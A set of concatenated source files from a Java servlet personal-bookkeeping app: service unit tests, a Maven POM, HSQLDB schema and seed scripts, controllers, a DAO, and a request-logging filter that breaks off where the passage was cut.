        Client client = mock(Client.class);
        when(client.getId()).thenReturn(1L);
        ClientDao clientDao = mock(ClientDao.class);
        when(clientDao.get(anyString())).thenReturn(client);
        CategoryDao categoryDao = mock(CategoryDao.class);
        List<Category> categories = new LinkedList<>();
        categories.add(new Category(0L, "category0"));
        categories.add(new Category(1L, "category1"));
        when(categoryDao.get(0L)).thenReturn(categories.get(0));
        when(categoryDao.get(1L)).thenReturn(categories.get(1));
        RecordDao recordDao = mock(RecordDao.class);
        when(recordDao.getExpenditureList(1L)).thenReturn(records);
        RecordService recordService = new RecordServiceImpl();
        ((RecordServiceImpl) recordService).setRecordDao(recordDao);
        ((RecordServiceImpl) recordService).setCategoryDao(categoryDao);
        ((RecordServiceImpl) recordService).setClientDao(clientDao);
        assertEquals(records, recordService.getExpenditureList(anyString()));
    }
    // getMonthlyExpenditure(login, month) delegates to RecordDao.getMonthlyExpenditure.
    @Test
    public void testGetMonthlyExpenditure() {
        Client client = mock(Client.class);
        when(client.getId()).thenReturn(0L);
        ClientDao clientDao = mock(ClientDao.class);
        when(clientDao.get(anyString())).thenReturn(client);
        RecordDao recordDao = mock(RecordDao.class);
        when(recordDao.getMonthlyExpenditure(0L, 1)).thenReturn(0L);
        RecordService recordService = new RecordServiceImpl();
        ((RecordServiceImpl) recordService).setRecordDao(recordDao);
        ((RecordServiceImpl) recordService).setClientDao(clientDao);
        assertEquals(0L, recordService.getMonthlyExpenditure(anyString(), 1).longValue());
    }
    // remove(id) propagates the DAO's success flag (true case).
    @Test
    public void testRemoveTrue() {
        RecordDao recordDao = mock(RecordDao.class);
        when(recordDao.remove(0L)).thenReturn(true);
        RecordService recordService = new RecordServiceImpl();
        ((RecordServiceImpl) recordService).setRecordDao(recordDao);
        assertTrue(recordService.remove(0L));
    }
    // remove(id) propagates the DAO's success flag (false case).
    @Test
    public void testRemoveFalse() {
        RecordDao recordDao = mock(RecordDao.class);
        when(recordDao.remove(0L)).thenReturn(false);
        RecordService recordService = new RecordServiceImpl();
        ((RecordServiceImpl) recordService).setRecordDao(recordDao);
        assertFalse(recordService.remove(0L));
    }
    // getMonthlyIncomeData builds a category-name -> amount map over all categories.
    @Test
    public void testGetMonthlyIncomeData() {
        Client client = mock(Client.class);
        when(client.getId()).thenReturn(0L);
        ClientDao clientDao = mock(ClientDao.class);
        when(clientDao.get(anyString())).thenReturn(client);
        CategoryDao categoryDao = mock(CategoryDao.class);
        List<Category> categories = new LinkedList<>();
        categories.add(new Category(0L, "category0"));
        categories.add(new Category(1L, "category1"));
        when(categoryDao.getAll()).thenReturn(categories);
        RecordDao recordDao = mock(RecordDao.class);
        when(recordDao.getMonthlyIncomeForCategory(0L, 0L, 1)).thenReturn(100L);
        when(recordDao.getMonthlyIncomeForCategory(0L, 1L, 1)).thenReturn(200L);
        RecordService recordService = new RecordServiceImpl();
        ((RecordServiceImpl) recordService).setRecordDao(recordDao);
        ((RecordServiceImpl) recordService).setCategoryDao(categoryDao);
        ((RecordServiceImpl) recordService).setClientDao(clientDao);
        Map<String, Long> data = new HashMap<>();
        data.put("category0", 100L);
        data.put("category1", 200L);
        assertEquals(data, recordService.getMonthlyIncomeData(anyString(), 1));
    }
    // getMonthlyExpenditureData mirrors the income-data test for expenditures.
    @Test
    public void testGetMonthlyExpenditureData() {
        Client client = mock(Client.class);
        when(client.getId()).thenReturn(0L);
        ClientDao clientDao = mock(ClientDao.class);
        when(clientDao.get(anyString())).thenReturn(client);
        CategoryDao categoryDao = mock(CategoryDao.class);
        List<Category> categories = new LinkedList<>();
        categories.add(new Category(0L, "category0"));
        categories.add(new Category(1L, "category1"));
        when(categoryDao.getAll()).thenReturn(categories);
        RecordDao recordDao = mock(RecordDao.class);
        when(recordDao.getMonthlyExpenditureForCategory(0L, 0L, 1)).thenReturn(100L);
        when(recordDao.getMonthlyExpenditureForCategory(0L, 1L, 1)).thenReturn(200L);
        RecordService recordService = new RecordServiceImpl();
        ((RecordServiceImpl) recordService).setRecordDao(recordDao);
        ((RecordServiceImpl) recordService).setCategoryDao(categoryDao);
        ((RecordServiceImpl) recordService).setClientDao(clientDao);
        Map<String, Long> data = new HashMap<>();
        data.put("category0", 100L);
        data.put("category1", 200L);
        assertEquals(data, recordService.getMonthlyExpenditureData(anyString(), 1));
    }
    // getTotalIncome(login) delegates to RecordDao.getTotalIncome(clientId).
    @Test
    public void testGetTotalIncome() {
        Client client = mock(Client.class);
        when(client.getId()).thenReturn(0L);
        ClientDao clientDao = mock(ClientDao.class);
        when(clientDao.get(anyString())).thenReturn(client);
        RecordDao recordDao = mock(RecordDao.class);
        when(recordDao.getTotalIncome(0L)).thenReturn(200L);
        RecordService recordService = new RecordServiceImpl();
        ((RecordServiceImpl) recordService).setRecordDao(recordDao);
        ((RecordServiceImpl) recordService).setClientDao(clientDao);
        assertEquals(200L, recordService.getTotalIncome(anyString()).longValue());
    }
    // getTotalExpenditure(login) delegates to RecordDao.getTotalExpenditure(clientId).
    @Test
    public void testGetTotalExpenditure() {
        Client client = mock(Client.class);
        when(client.getId()).thenReturn(0L);
        ClientDao clientDao = mock(ClientDao.class);
        when(clientDao.get(anyString())).thenReturn(client);
        RecordDao recordDao = mock(RecordDao.class);
        when(recordDao.getTotalExpenditure(0L)).thenReturn(200L);
        RecordService recordService = new RecordServiceImpl();
        ((RecordServiceImpl) recordService).setRecordDao(recordDao);
        ((RecordServiceImpl) recordService).setClientDao(clientDao);
        assertEquals(200L, recordService.getTotalExpenditure(anyString()).longValue());
    }
    // getTotalAverageIncome(login) delegates to RecordDao.getTotalAverageIncome.
    @Test
    public void testGetTotalAverageIncome() {
        Client client = mock(Client.class);
        when(client.getId()).thenReturn(0L);
        ClientDao clientDao = mock(ClientDao.class);
        when(clientDao.get(anyString())).thenReturn(client);
        RecordDao recordDao = mock(RecordDao.class);
        when(recordDao.getTotalAverageIncome(0L)).thenReturn(200L);
        RecordService recordService = new RecordServiceImpl();
        ((RecordServiceImpl) recordService).setRecordDao(recordDao);
        ((RecordServiceImpl) recordService).setClientDao(clientDao);
        assertEquals(200L, recordService.getTotalAverageIncome(anyString()).longValue());
    }
    // getTotalAverageExpenditure(login) delegates to RecordDao.getTotalAverageExpenditure.
    @Test
    public void testGetTotalAverageExpenditure() {
        Client client = mock(Client.class);
        when(client.getId()).thenReturn(0L);
        ClientDao clientDao = mock(ClientDao.class);
        when(clientDao.get(anyString())).thenReturn(client);
        RecordDao recordDao = mock(RecordDao.class);
        when(recordDao.getTotalAverageExpenditure(0L)).thenReturn(200L);
        RecordService recordService = new RecordServiceImpl();
        ((RecordServiceImpl) recordService).setRecordDao(recordDao);
        ((RecordServiceImpl) recordService).setClientDao(clientDao);
        assertEquals(200L, recordService.getTotalAverageExpenditure(anyString()).longValue());
    }
    // getTotalMonthlyBalanceData(login) returns the DAO's coordinate list unchanged.
    @Test
    public void testGetTotalMonthlyBalanceData() {
        Client client = mock(Client.class);
        when(client.getId()).thenReturn(0L);
        ClientDao clientDao = mock(ClientDao.class);
        when(clientDao.get(anyString())).thenReturn(client);
        List<Coordinate> data = new LinkedList<>();
        data.add(new Coordinate("", 0L));
        RecordDao recordDao = mock(RecordDao.class);
        when(recordDao.getTotalMonthlyBalanceData(0L)).thenReturn(data);
        RecordService recordService = new RecordServiceImpl();
        ((RecordServiceImpl) recordService).setRecordDao(recordDao);
        ((RecordServiceImpl) recordService).setClientDao(clientDao);
        assertEquals(data, recordService.getTotalMonthlyBalanceData(anyString()));
    }
}
<file_sep><project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0
http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>ru.kpfu.itis.fujitsu.lzakharov.bookkeeper</groupId>
<artifactId>bookkeeper</artifactId>
<version>1.0-SNAPSHOT</version>
<name>Bookkeeper</name>
<packaging>pom</packaging>
<properties>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
<maven.compiler.source>1.8</maven.compiler.source>
<maven.compiler.target>1.8</maven.compiler.target>
<commons-io.version>2.4</commons-io.version>
<jbcrypt.version>0.3m</jbcrypt.version>
<servlet-api.version>3.1.0</servlet-api.version>
<freemarker.version>2.3.24-incubating</freemarker.version>
<hsqldb.version>2.3.3</hsqldb.version>
<hsqldb.sqltool.version>2.3.3</hsqldb.sqltool.version>
<hikari.version>2.4.3</hikari.version>
<log4j.version>1.2.17</log4j.version>
<junit.version>4.12</junit.version>
<mockito.version>1.10.19</mockito.version>
<powermock.version>1.6.2</powermock.version>
<cargo.version>1.4.18</cargo.version>
</properties>
<modules>
<module>bookkeeper-db</module>
<module>bookkeeper-model</module>
<module>bookkeeper-dao</module>
<module>bookkeeper-service</module>
<module>bookkeeper-webapp</module>
</modules>
<dependencyManagement>
<dependencies>
<!-- Our Modules -->
<dependency>
<groupId>ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.db</groupId>
<artifactId>bookkeeper-db</artifactId>
<version>1.0-SNAPSHOT</version>
</dependency>
<dependency>
<groupId>ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model</groupId>
<artifactId>bookkeeper-model</artifactId>
<version>1.0-SNAPSHOT</version>
</dependency>
<dependency>
<groupId>ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.dao</groupId>
<artifactId>bookkeeper-dao</artifactId>
<version>1.0-SNAPSHOT</version>
</dependency>
<dependency>
<groupId>ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service</groupId>
<artifactId>bookkeeper-service</artifactId>
<version>1.0-SNAPSHOT</version>
</dependency>
<dependency>
<groupId>ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.webapp</groupId>
<artifactId>bookkeeper-webapp</artifactId>
<version>1.0-SNAPSHOT</version>
</dependency>
<dependency>
<groupId>commons-io</groupId>
<artifactId>commons-io</artifactId>
<version>${commons-io.version}</version>
</dependency>
<dependency>
<groupId>org.mindrot</groupId>
<artifactId>jbcrypt</artifactId>
<version>${jbcrypt.version}</version>
</dependency>
<!-- WEB -->
<dependency>
<groupId>javax.servlet</groupId>
<artifactId>javax.servlet-api</artifactId>
<version>${servlet-api.version}</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.freemarker</groupId>
<artifactId>freemarker</artifactId>
<version>${freemarker.version}</version>
</dependency>
<!-- JDBC -->
<dependency>
<groupId>org.hsqldb</groupId>
<artifactId>hsqldb</artifactId>
<version>${hsqldb.version}</version>
</dependency>
<dependency>
<groupId>org.hsqldb</groupId>
<artifactId>sqltool</artifactId>
<version>${hsqldb.sqltool.version}</version>
<scope>test</scope>
</dependency>
<dependency>
<groupId>com.zaxxer</groupId>
<artifactId>HikariCP</artifactId>
<version>${hikari.version}</version>
</dependency>
<!-- Logging -->
<dependency>
<groupId>log4j</groupId>
<artifactId>log4j</artifactId>
<version>${log4j.version}</version>
</dependency>
<!-- Test -->
<dependency>
<groupId>junit</groupId>
<artifactId>junit</artifactId>
<version>${junit.version}</version>
<scope>test</scope>
</dependency>
<dependency>
<groupId>org.mockito</groupId>
<artifactId>mockito-all</artifactId>
<version>${mockito.version}</version>
<scope>test</scope>
</dependency>
<dependency>
<groupId>org.powermock</groupId>
<artifactId>powermock-module-junit4</artifactId>
<version>${powermock.version}</version>
<scope>test</scope>
</dependency>
<dependency>
<groupId>org.powermock</groupId>
<artifactId>powermock-api-mockito</artifactId>
<version>${powermock.version}</version>
<scope>test</scope>
</dependency>
</dependencies>
</dependencyManagement>
<build>
<pluginManagement>
<plugins>
<plugin>
<groupId>org.eclipse.jetty</groupId>
<artifactId>jetty-maven-plugin</artifactId>
<version>9.3.7.v20160115</version>
<!-- http://www.eclipse.org/jetty/documentation/current/jetty-maven-plugin.html -->
<configuration>
<httpConnector>
<port>8081</port>
</httpConnector>
</configuration>
</plugin>
</plugins>
</pluginManagement>
</build>
</project>
<file_sep>INSERT INTO CATEGORY (NAME)
-- Seed the CATEGORY lookup table with the default bookkeeping categories
-- (Russian labels, listed alphabetically).
VALUES ('Аренда'),
       ('Другое'),
       ('Зарплата'),
       ('Коммунальные Платежи'),
       ('Налоги'),
       ('Питание'),
       ('Покупки'),
       ('Работа'),
       ('Развлечения'),
       ('Связь'),
       ('Стипендия'),
       ('Транспорт');
<file_sep>package ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.webapp.controllers;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.AbstractModel;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.Record;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service.CategoryService;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service.RecordService;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service.impl.CategoryServiceImpl;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service.impl.RecordServiceImpl;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.util.Calendar;
import java.util.List;
/**
 * Renders the signed-in client's dashboard: current balance, this month's
 * income and expenditure totals, the full record list, and per-category
 * chart data, then forwards to the "home.ftl" template.
 */
public class HomeController extends AbstractController {
    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        RecordService records = new RecordServiceImpl();
        String clientLogin = req.getSession().getAttribute("login").toString();
        // Calendar.MONTH is zero-based, so shift into the 1..12 range the service expects.
        int currentMonth = Calendar.getInstance().get(Calendar.MONTH) + 1;

        req.setAttribute("balance", records.getBalance(clientLogin));
        req.setAttribute("income", records.getMonthlyIncome(clientLogin, currentMonth));
        req.setAttribute("expenditure", records.getMonthlyExpenditure(clientLogin, currentMonth));
        req.setAttribute("records", records.get(clientLogin));
        req.setAttribute("incomeData", records.getMonthlyIncomeData(clientLogin, currentMonth));
        req.setAttribute("expenditureData", records.getMonthlyExpenditureData(clientLogin, currentMonth));

        req.getRequestDispatcher("home.ftl").forward(req, resp);
    }
}
<file_sep>package ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.webapp.controllers;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.Client;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service.ClientService;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service.impl.ClientServiceImpl;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
/**
 * Handles password-change requests from the settings page.
 * Re-authenticates the client with the old password before applying the
 * new one, then re-renders "settings.ftl" with either a success or an
 * error message.
 */
public class PasswordController extends AbstractController {
    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        ClientService clientService = new ClientServiceImpl();
        String login = req.getSession().getAttribute("login").toString();
        String password = req.getParameter("password");
        String newPassword = req.getParameter("newPassword");

        // Verify the old password by re-authenticating.
        Client client = clientService.find(login, password);
        if (client != null) {
            // NOTE(review): newPassword is forwarded as received; presumably
            // ClientService hashes it before persisting — confirm, since
            // RegistrationController hashes with BCrypt in the controller layer.
            clientService.updatePassword(client, newPassword);
            req.setAttribute("check", "Пароль успешно обновлен!");
        } else {
            req.setAttribute("error", "Неверный старый пароль!");
        }
        // Both outcomes re-render the same template; only the message differs.
        req.getRequestDispatcher("settings.ftl").forward(req, resp);
    }
}
<file_sep>package ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.dao;
import org.junit.Test;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.dao.hsqldb.ClientDaoHsqldb;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.Client;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.enums.Gender;
import java.util.LinkedList;
import static org.junit.Assert.*;
/**
 * CRUD tests for {@code ClientDaoHsqldb}; the generic CRUD cases live in
 * {@code GenericDaoHsqldbTest}, this class supplies the CLIENT-specific
 * fixtures plus extra tests for lookup by login.
 */
public class ClientDaoHsqldbTest extends GenericDaoHsqldbTest<Client> {
    // A login guaranteed to be absent from the seeded test data.
    public final String NOT_EXISTING_LOGIN = "########";

    @Override
    public void setUp() throws Exception {
        super.setUp();
    }

    /** Supplies the DAO under test to the generic base class. */
    @Override
    public void initDao() {
        this.dao = new ClientDaoHsqldb();
    }

    /** Mirrors the rows inserted by the test seed script (IDENTITY ids 0 and 1). */
    @Override
    public void createTable() {
        this.table = new LinkedList<>();
        table.add(new Client(0L, "login", "password", Gender.M));
        table.add(new Client(1L, "client", "qwerty", Gender.F));
    }

    @Override
    public Client objectToUpdate() {
        return new Client(0L, "newLogin", "newPassword", Gender.M);
    }

    @Override
    public Client nonexistentObject() {
        return new Client(NOT_EXISTING_ID, "login", "password", Gender.M);
    }

    @Override
    public Client newObject() {
        return new Client("A", "A", Gender.F);
    }

    /** Lookup by login should return the seeded client with that login. */
    @Test
    public void testGetExistingByLogin() {
        Client client = ((ClientDao) dao).get("login");
        assertEquals(table.get(0), client);
    }

    /** Lookup by an unknown login should return null rather than throw. */
    @Test
    public void testGetNotExistingByLogin() {
        assertNull(((ClientDao) dao).get(NOT_EXISTING_LOGIN));
    }

    // daoWithSQLException comes from the generic base test — presumably a DAO
    // whose connection throws SQLException; confirm in GenericDaoHsqldbTest.
    @Test(expected = DataAccessException.class)
    public void testGetByLoginWithDataAccessException() throws Exception {
        ((ClientDao) daoWithSQLException).get("client");
    }
}
<file_sep>CREATE TABLE CLIENT (
-- Registered users; LOGIN/PASSWORD are checked at sign-in by the service layer.
ID BIGINT IDENTITY CONSTRAINT PK_USER PRIMARY KEY,
LOGIN VARCHAR(32) NOT NULL,
PASSWORD VARCHAR(128) NOT NULL,
GENDER CHAR CHECK (GENDER IN ('M', 'F'))
);
-- Spending/income categories referenced by RECORD rows.
CREATE TABLE CATEGORY (
ID BIGINT IDENTITY CONSTRAINT PK_CATEGORY PRIMARY KEY,
NAME VARCHAR(32)
);
-- One bookkeeping entry per row; TYPE distinguishes income from expenditure.
CREATE TABLE RECORD (
ID BIGINT IDENTITY CONSTRAINT PK_RECORD PRIMARY KEY,
CLIENT_ID BIGINT NOT NULL,
CATEGORY_ID BIGINT NOT NULL,
TYPE VARCHAR(16) CHECK (TYPE IN ('INCOME', 'EXPENDITURE')),
AMOUNT INTEGER NOT NULL CHECK (RECORD.AMOUNT > 0),
DESCRIPTION VARCHAR(256),
CREATION_DATE DATE NOT NULL,
-- Deleting a client or category cascades to its records.
CONSTRAINT FK_CLIENT FOREIGN KEY (CLIENT_ID) REFERENCES CLIENT (ID)
ON DELETE CASCADE,
CONSTRAINT FK_CATEGORY FOREIGN KEY (CATEGORY_ID) REFERENCES CATEGORY (ID)
ON DELETE CASCADE
);<file_sep>INSERT INTO CLIENT (LOGIN, PASSWORD, GENDER)
VALUES ('login', '<PASSWORD>', 'M'),
-- NOTE(review): '<PASSWORD>' looks like a redaction placeholder rather than a
-- real fixture value; ClientDaoHsqldbTest expects this row's password to be
-- 'password' — confirm against the original script.
('client', 'qwerty', 'F');
INSERT INTO CATEGORY (NAME)
VALUES ('category0'),
('category1');
-- Two records per client, covering both TYPE values and both categories.
INSERT INTO RECORD (CLIENT_ID, CATEGORY_ID, TYPE, AMOUNT, DESCRIPTION, CREATION_DATE)
VALUES (0, 0, 'INCOME', 100, 'description0', '2016-01-01'),
(0, 1, 'INCOME', 200, 'description1', '2016-01-02'),
(1, 1, 'EXPENDITURE', 100, 'description2', '2016-01-01'),
(1, 0, 'EXPENDITURE', 200, 'description3', '2016-01-02');
<file_sep>package ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service;
/**
 * Thrown when an attempt is made to register a client whose login is
 * already taken by an existing account.
 */
public class ClientAlreadyExistsException extends Exception {

    /**
     * @param message detail message describing the conflict
     */
    public ClientAlreadyExistsException(String message) {
        super(message);
    }

    /**
     * @param message detail message describing the conflict
     * @param cause   the underlying cause (e.g. a constraint violation), may be null
     */
    public ClientAlreadyExistsException(String message, Throwable cause) {
        super(message, cause);
    }
}
<file_sep>package ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.Category;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.Coordinate;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.Record;
import java.util.List;
import java.util.Map;
/**
 * Record Service interface.
 * Provides the business logic that mediates between the record DAO and the
 * web controllers (totals, monthly aggregates and chart data per client).
 */
public interface RecordService {
    /**
     * Creates the specified record.
     *
     * @param record the record to create
     * @return the created record's id
     */
    long create(Record record);
    /**
     * Returns all records of the client identified by login.
     *
     * @param login the client's login
     * @return list containing all records of the client, may be empty
     */
    List<Record> get(String login);
    /**
     * Returns the current balance of the client identified by login.
     *
     * @param login the client's login
     * @return current balance for the client
     */
    Long getBalance(String login);
    /**
     * Returns the income total for the specified month of the client.
     *
     * @param login the client's login
     * @param month number of the month (1..12)
     * @return amount of income in that month for the client
     */
    Long getMonthlyIncome(String login, int month);
    /**
     * Returns all income records of the client identified by login.
     *
     * @param login the client's login
     * @return list of all income records of the client
     */
    List<Record> getIncomeList(String login);
    /**
     * Returns all expenditure records of the client identified by login.
     *
     * @param login the client's login
     * @return list of all expenditure records of the client
     */
    List<Record> getExpenditureList(String login);
    /**
     * Returns the expenditure total for the specified month of the client.
     *
     * @param login the client's login
     * @param month number of the month (1..12)
     * @return amount of expenditure in that month for the client
     */
    Long getMonthlyExpenditure(String login, int month);
    /**
     * Removes the record identified by id.
     *
     * @param id the identifier (primary key) of the record to remove
     * @return {@code true} if the record was removed;
     *         {@code false} otherwise
     */
    boolean remove(Long id);
    /**
     * Returns the client's monthly income broken down by category.
     *
     * @param login the client's login
     * @param month number of the month (1..12)
     * @return map of category name to the month's income for that category
     */
    Map<String, Long> getMonthlyIncomeData(String login, int month);
    /**
     * Returns the client's monthly expenditure broken down by category.
     *
     * @param login the client's login
     * @param month number of the month (1..12)
     * @return map of category name to the month's expenditure for that category
     */
    Map<String, Long> getMonthlyExpenditureData(String login, int month);
    /**
     * Returns the total income of the client identified by login.
     *
     * @param login the client's login
     * @return total income of the client
     */
    Long getTotalIncome(String login);
    /**
     * Returns the total expenditure of the client identified by login.
     *
     * @param login the client's login
     * @return total expenditure of the client
     */
    Long getTotalExpenditure(String login);
    /**
     * Returns the overall average income of the client identified by login.
     *
     * @param login the client's login
     * @return total average income of the client
     */
    Long getTotalAverageIncome(String login);
    /**
     * Returns the overall average expenditure of the client identified by login.
     *
     * @param login the client's login
     * @return total average expenditure of the client
     */
    Long getTotalAverageExpenditure(String login);
    /**
     * Returns (month, balance) pairs for the client identified by login,
     * suitable for plotting the balance over time.
     *
     * @param login the client's login
     * @return list of month/balance pairs for the client, may be empty
     *
     * @see Coordinate
     */
    List<Coordinate> getTotalMonthlyBalanceData(String login);
}
<file_sep>package ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model;
/**
* Represents the Coordinate.
*/
public class Coordinate {
private String x;
private Long y;
public Coordinate(String x, Long y) {
this.x = x;
this.y = y;
}
public String getX() {
return x;
}
public void setX(String x) {
this.x = x;
}
public Long getY() {
return y;
}
public void setY(Long y) {
this.y = y;
}
@Override
public String toString() {
return "Coordinate{" +
"x='" + x + '\'' +
", y=" + y +
'}';
}
}
<file_sep>package ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.dao.hsqldb;
import org.apache.log4j.Logger;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.dao.CategoryDao;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.dao.DataAccessException;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.Category;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.LinkedList;
import java.util.List;
/**
 * HSQLDB implementation of {@link CategoryDao}: supplies the CATEGORY-table
 * SQL and row mapping; generic statement execution lives in
 * {@link GenericDaoHsqldb}.
 */
public class CategoryDaoHsqldb extends GenericDaoHsqldb<Category> implements CategoryDao {
    final static Logger log = Logger.getLogger(CategoryDaoHsqldb.class.getName());

    @Override
    protected String getTableName() {
        return "CATEGORY";
    }

    @Override
    protected String getSelectByIdQuery() {
        return "SELECT ID, NAME " +
                "FROM CATEGORY WHERE ID = ?";
    }

    @Override
    protected String getSelectAllQuery() {
        return "SELECT ID, NAME " +
                "FROM CATEGORY";
    }

    @Override
    protected String getUpdateQuery() {
        // The trailing space after the parameter marker matters: without it the
        // concatenated SQL would read "SET NAME = ?WHERE ID = ?".
        return "UPDATE CATEGORY " +
                "SET NAME = ? " +
                "WHERE ID = ?";
    }

    @Override
    protected String getAddQuery() {
        return "INSERT INTO CATEGORY (NAME) " +
                "VALUES (?)";
    }

    /**
     * Maps every row of the result set onto a {@link Category}.
     *
     * @param rs result set positioned before the first row
     * @return list of mapped categories, may be empty
     * @throws DataAccessException if reading the result set fails
     */
    @Override
    protected List<Category> parseResultSet(ResultSet rs) {
        List<Category> list = new LinkedList<>();
        try {
            while (rs.next()) {
                list.add(new Category(rs.getLong("ID"), rs.getString("NAME")));
            }
        } catch (SQLException e) {
            String msg = "Error parsing ResultSet";
            log.error(msg, e); // log the cause so the stack trace is not lost
            throw new DataAccessException(msg, e);
        }
        return list;
    }

    /** Binds NAME and ID for the UPDATE statement, in that parameter order. */
    @Override
    protected void prepareStatementForUpdate(PreparedStatement pstmt, Category model) {
        try {
            pstmt.setString(1, model.getName());
            pstmt.setLong(2, model.getId());
        } catch (SQLException e) {
            String msg = "Error preparing statement for update";
            log.error(msg, e);
            throw new DataAccessException(msg, e);
        }
    }

    /** Binds NAME for the INSERT statement; ID is IDENTITY-generated. */
    @Override
    protected void prepareStatementForAdd(PreparedStatement pstmt, Category model) {
        try {
            pstmt.setString(1, model.getName());
        } catch (SQLException e) {
            String msg = "Error preparing statement for add";
            log.error(msg, e);
            throw new DataAccessException(msg, e);
        }
    }
}
<file_sep>package ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.webapp.controllers;
import org.mindrot.jbcrypt.BCrypt;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.Client;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.enums.Gender;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service.ClientAlreadyExistsException;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service.ClientService;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service.impl.ClientServiceImpl;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
/**
 * Sign-up controller: GET renders the registration form, POST creates the
 * client (with a BCrypt-hashed password) and redirects to the dashboard.
 */
public class RegistrationController extends AbstractController {
    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        req.getRequestDispatcher("registration.ftl").forward(req, resp);
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        ClientService clientService = new ClientServiceImpl();
        Client client = parseParameters(req);
        try {
            clientService.create(client);
            // NOTE(review): the session "login" attribute (read by HomeController)
            // is not set here before redirecting to /home — confirm it is
            // established elsewhere (e.g. a login filter or the service layer).
            resp.sendRedirect("/home");
        } catch (ClientAlreadyExistsException e) {
            String error = "Пользователь с введенным логином уже существует";
            req.setAttribute("error", error);
            req.getRequestDispatcher("registration.ftl").forward(req, resp);
        }
    }

    /**
     * Builds a {@link Client} from the form parameters; the password is
     * hashed with BCrypt (fresh salt) before it leaves the controller.
     */
    private Client parseParameters(HttpServletRequest req) {
        Client client = new Client();
        client.setLogin(req.getParameter("login"));
        client.setPassword(BCrypt.hashpw(req.getParameter("password"), BCrypt.gensalt()));
        client.setGender(Gender.valueOf(req.getParameter("gender")));
        return client;
    }
}
<file_sep>package ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.webapp.filters;
import org.apache.log4j.Logger;
import javax.servlet.*;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.text.DateFormat;
import java.util.Date;
import java.util.Locale;
import java.util.TimeZone;
/**
 * Servlet filter that writes one access-log line per HTTP request in
 * Common Log Format: {@code ip - user [date] "METHOD uri protocol" status length}.
 * The date locale and time zone are configurable via the filter's
 * "language" and "timezone" init-params.
 */
public class LogFilter implements Filter {
    private static final Logger log = Logger.getLogger(LogFilter.class);

    private Locale locale;
    private TimeZone timezone;

    @Override
    public void init(FilterConfig filterConfig) throws ServletException {
        // Both init-params are optional; fall back to the JVM defaults.
        String language = filterConfig.getInitParameter("language");
        this.locale = (language == null) ? Locale.getDefault() : new Locale(language);
        String tz = filterConfig.getInitParameter("timezone");
        this.timezone = (tz == null) ? TimeZone.getDefault() : TimeZone.getTimeZone(tz);
    }

    @Override
    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain)
            throws IOException, ServletException {
        if (!(servletRequest instanceof HttpServletRequest)
                || !(servletResponse instanceof HttpServletResponse)) {
            throw new ServletException("Non-HTTP requests are not supported");
        }
        HttpServletRequest request = (HttpServletRequest) servletRequest;
        HttpServletResponse response = (HttpServletResponse) servletResponse;

        // Capture request-time details before the rest of the chain runs.
        DateFormat fmt = DateFormat.getDateTimeInstance(DateFormat.FULL, DateFormat.FULL, locale);
        fmt.setTimeZone(timezone);
        String date = fmt.format(new Date());
        String ip = request.getRemoteAddr();
        String user = request.getRemoteUser();
        if (user == null) {
            user = "-";
        }
        String method = request.getMethod();
        String uri = request.getRequestURI();
